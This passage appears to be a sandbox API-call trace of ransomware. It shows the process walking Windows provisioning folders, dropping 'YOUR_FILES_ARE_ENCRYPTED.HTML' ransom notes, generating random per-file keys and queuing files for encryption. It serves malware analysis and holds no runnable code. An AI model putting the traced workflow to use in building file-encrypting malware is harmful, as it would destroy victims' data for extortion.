nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.846] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.846] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml") returned 97 [0106.846] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.846] lstrlenW (lpString=".xml") returned 4 [0106.846] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.846] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.846] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.846] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=313) returned 1 [0106.846] CloseHandle (hObject=0x31c) returned 1 [0106.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13e3f24, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13e3f24, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.846] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.847] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.847] GetProcessHeap () returned 0x600000 [0106.847] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.847] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.847] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.848] CloseHandle (hObject=0x32c) returned 1 [0106.848] GetProcessHeap () returned 0x600000 [0106.848] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.848] GetProcessHeap () returned 0x600000 [0106.848] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.849] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.849] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0106.849] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.849] GetProcessHeap () returned 0x600000 [0106.849] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0106.849] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.850] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.851] CloseHandle (hObject=0x308) returned 1 [0106.851] GetProcessHeap () returned 0x600000 [0106.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0106.851] GetProcessHeap () returned 0x600000 [0106.851] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.852] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", cAlternateFileName="{3742E~1")) returned 1 [0106.852] StrStrIW (lpFirst="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.852] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned 80 [0106.852] GetProcessHeap () returned 0x600000 [0106.852] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.853] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" [0106.853] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*" [0106.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.856] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.856] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2363c60, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2363c60, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2389ec8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.856] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.856] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned 99 [0106.856] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.856] lstrlenW (lpString=".xml") returned 4 [0106.856] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.856] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.856] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.857] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=6536) returned 1 [0106.857] GetProcessHeap () returned 0x600000 [0106.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.859] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="13") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="8E") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="6C") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="BC") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="F4") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="35") returned 2 [0106.859] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="FD") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="DC") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="CD") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="4F") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CF") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="AB") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="FD") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="8F") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A7") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F8") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="20") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="0E") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="39") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="55") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="48") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="49") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E0") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="AA") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="CA") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="98") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="FB") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F7") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="72") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="42") returned 2 [0106.859] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="6A") returned 2 [0106.860] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="02") returned 2 [0106.860] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" [0106.860] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.860] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.860] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.860] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.860] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml") returned 100 [0106.860] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.860] lstrlenW (lpString=".xml") returned 4 [0106.860] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.860] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.860] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.861] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.861] CloseHandle (hObject=0x31c) returned 1 [0106.861] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.861] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.861] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned 85 [0106.861] GetProcessHeap () returned 0x600000 [0106.861] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.861] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" [0106.861] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*" [0106.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.862] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.862] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.862] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.862] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned 93 [0106.862] GetProcessHeap () returned 0x600000 [0106.862] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0106.863] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" [0106.863] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*" [0106.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.864] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.864] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa214da47, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa214da47, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2173cb2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xbd7, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.864] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.864] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.864] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.864] lstrlenW (lpString=".provxml") returned 8 [0106.864] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.864] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2199f29, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2199f29, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2199f29, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0106.864] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.864] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0106.864] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.864] lstrlenW (lpString=".provxml") returned 8 [0106.864] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.864] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0106.864] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.864] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml") returned 109 [0106.864] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0106.864] lstrlenW (lpString=".provxml") returned 8 [0106.864] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0106.864] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, 